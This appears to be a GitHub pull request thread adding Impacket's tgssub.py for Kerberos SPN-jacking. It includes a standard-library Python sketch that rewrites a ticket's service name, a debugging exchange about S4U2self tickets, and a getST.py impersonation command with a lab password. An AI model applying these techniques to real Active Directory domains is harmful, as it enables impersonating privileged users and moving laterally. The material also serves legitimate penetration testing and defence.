impacket
[tgssub.py] New example script: adding tgssub for SPN-jacking and manual sname manipulation
Example script to allow for SPN-jacking and manual manipulation of tickets to edit the sname (i.e. SPN) the ticket is issued for.
Python equivalent to Rubeus tgssub command (https://github.com/GhostPack/Rubeus#tgssub)
This can be done because the service name is not in the encrypted part of the ticket (cf. Wagging the Dog).
This is already done in Impacket internals with the AnySPN technique, but now attackers can use this standalone script, along with describeTicket.py from #1201, to manipulate (Rubeus tgssub) and inspect (Rubeus describe) tickets manually.
References
- https://www.thehacker.recipes/ad/movement/kerberos/spn-jacking
- https://www.semperis.com/blog/spn-jacking-an-edge-case-in-writespn-abuse/
- https://www.secureauth.com/blog/kerberos-delegation-spns-and-more/
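Added example, not part of this PR or of Impacket's tgssub.py: a stand-alone Python sketch of what the substitution described above does to the Ticket structure, so the point about the service name sitting outside the encrypted part is visible in bytes. Ticket ::= [APPLICATION 1] SEQUENCE { tkt-vno, realm, sname, enc-part }, and only enc-part is ciphertext, so sname can be rewritten by re-encoding the outer SEQUENCE and copying enc-part through verbatim. The code uses a minimal hand-written DER codec instead of pyasn1/impacket so it runs with the standard library only; the realm, hostnames and the enc-part bytes are constructed; the rule that a bare service class keeps the original host is assumed Rubeus-style behaviour, and a single-component sname (the S4U2self "no '/'" case raised later in this thread) is rejected unless a full class/host is given.

```python
"""Kerberos sname substitution on the cleartext part of a Ticket.

Added example (not Impacket's tgssub.py). Uses a tiny hand-written DER codec
instead of pyasn1/impacket so it runs with the standard library only.
"""

NT_PRINCIPAL = 1  # single-component name, e.g. the sname of an S4U2self ticket
NT_SRV_INST = 2   # service/instance name, e.g. CIFS/host.corp.local


# --- minimal DER encode/decode (only the tags a Ticket needs) ---------------
def _len(n):
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag, body):
    return bytes([tag]) + _len(len(body)) + body


def _ctx(n, body):   # [n] EXPLICIT context tag, constructed
    return _tlv(0xA0 | n, body)


def _int(v):
    return _tlv(0x02, v.to_bytes(max(1, (v.bit_length() + 8) // 8), "big", signed=True))


def _gstr(s):        # KerberosString ::= GeneralString
    return _tlv(0x1B, s.encode("ascii"))


def _seq(*items):
    return _tlv(0x30, b"".join(items))


def _read_tlv(buf, off=0):
    """Return (tag, body, end) for the TLV starting at buf[off]."""
    tag, first = buf[off], buf[off + 1]
    if first < 0x80:
        length, hdr = first, 2
    else:
        nbytes = first & 0x7F
        length, hdr = int.from_bytes(buf[off + 2:off + 2 + nbytes], "big"), 2 + nbytes
    start = off + hdr
    return tag, buf[start:start + length], start + length


def _children(body):
    out, off = [], 0
    while off < len(body):
        tag, inner, off = _read_tlv(body, off)
        out.append((tag, inner))
    return out


# --- Ticket ::= [APPLICATION 1] SEQUENCE { tkt-vno[0], realm[1], sname[2], enc-part[3] }
def principal_name(name_type, parts):
    return _seq(_ctx(0, _int(name_type)), _ctx(1, _seq(*[_gstr(p) for p in parts])))


def build_ticket(realm, sname_parts, enc_part_cipher):
    """Constructed sample ticket; enc_part_cipher stands in for the real ciphertext."""
    name_type = NT_SRV_INST if len(sname_parts) > 1 else NT_PRINCIPAL
    enc = _seq(_ctx(0, _int(18)), _ctx(2, _tlv(0x04, enc_part_cipher)))  # etype 18, cipher
    return _tlv(0x61, _seq(_ctx(0, _int(5)), _ctx(1, _gstr(realm)),
                           _ctx(2, principal_name(name_type, sname_parts)), _ctx(3, enc)))


def parse_ticket(ticket):
    """Pull realm, sname and the untouched enc-part TLV out of a Ticket."""
    tag, body, _ = _read_tlv(ticket)
    if tag != 0x61:
        raise ValueError("not a Ticket (expected APPLICATION 1)")
    fields = {t & 0x1F: v for t, v in _children(_read_tlv(body)[1])}
    pn = {t & 0x1F: v for t, v in _children(_read_tlv(fields[2])[1])}
    name_type = int.from_bytes(_read_tlv(pn[0])[1], "big", signed=True)
    parts = [v.decode("ascii") for _, v in _children(_read_tlv(pn[1])[1])]
    return {"realm": _read_tlv(fields[1])[1].decode("ascii"), "name_type": name_type,
            "sname": parts, "enc_part": fields[3], "tkt_vno": fields[0]}


def substitute_sname(ticket, altservice):
    """Rewrite sname the way tgssub/getST -altservice do; enc-part is copied verbatim.

    'CIFS/host' replaces the whole name; a bare 'CIFS' keeps the original host
    (assumed Rubeus-style semantics). A single-component sname (S4U2self) has no
    host to keep, so a bare class is rejected: this is the '/' edge case from the PR.
    """
    t = parse_ticket(ticket)
    if "/" in altservice:
        new_parts = altservice.split("/", 1)
    elif len(t["sname"]) == 2:
        new_parts = [altservice, t["sname"][1]]
    else:
        raise ValueError("sname %r has no service class; pass class/host" % (t["sname"],))
    return _tlv(0x61, _seq(_ctx(0, t["tkt_vno"]), _ctx(1, _gstr(t["realm"])),
                           _ctx(2, principal_name(NT_SRV_INST, new_parts)),
                           _ctx(3, t["enc_part"])))


def enc_part_unchanged(original, substituted):
    """The check that matters: the encrypted part is byte-identical after substitution."""
    return parse_ticket(original)["enc_part"] == parse_ticket(substituted)["enc_part"]


if __name__ == "__main__":
    cipher = bytes(range(64))  # constructed stand-in for the AES-encrypted EncTicketPart
    host_tkt = build_ticket("CORP.LOCAL", ["HOST", "ws01.corp.local"], cipher)
    cifs_tkt = substitute_sname(host_tkt, "CIFS")
    print(parse_ticket(cifs_tkt)["sname"], enc_part_unchanged(host_tkt, cifs_tkt))
```

Two caveats a practitioner should keep in mind. First, nothing here forges anything: the service still decrypts enc-part with its own long-term key, so the substituted ticket is only accepted when the alternative SPN is held by the same account (or an account sharing the same key) as the original sname. Second, as the thread notes, the ticket bytes are not the only place the name lives; the sname in the surrounding credential structure (KRB-CRED / ccache) must be updated too, or the client will not select the ticket for the new service.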

#1202 now handles -altservice, allowing for mirroring of Rubeus's ability to do so. Service substitution can then be conducted either separately with this standalone tool, or with getST's new feature brought in https://github.com/SecureAuthCorp/impacket/pull/1202/commits/bdf6c0e9096912845c8e998f4f431b2b631e6ac1
there is some problem when I integrate this PR into getST: the ticket it generated cannot be used when the source ticket is returned by s4u2self
you need to change this too

and you will get an error here

because the ticket returned by s4u2self has no service class, so there is no '/'
Can you use GitHub's review feature, or indicate lines where you think there are errors?
Can you give more details (debug print, screenshot) of what you're trying to do?
If you're referring to https://github.com/SecureAuthCorp/impacket/pull/1256/files#diff-6282295c24020ba24be7e2a8a1133327088ab06cd43bded706a193ec283ea1e7R49, as you can see this line is in an "if/else" statement checking the presence of "/" in the original ticket's sname. Have you even tried before pointing this out?
I do s4u2self with this PR, and here is the command I use:
getST.py mother.fucker/test$:qwe123... -impersonate Administrator -dc-ip 192.168.56.145 -self -altservice CIFS/WIN-PADVTVG8OT8.mother.fucker -debug
here is the result:
seems like all is good, but when I pass this ticket to smbclient, I get this:

sorry, maybe I changed your code by accident
turns out my copy of your tgssub.py is outdated
Worked with @wqreytuk, this feature needs further testing, but it now works on our end. The substitution wasn't complete. The information in the ticket wasn't replaced. Only the information in the credential object was. This is now fixed.
just finished testing this commit, it works fine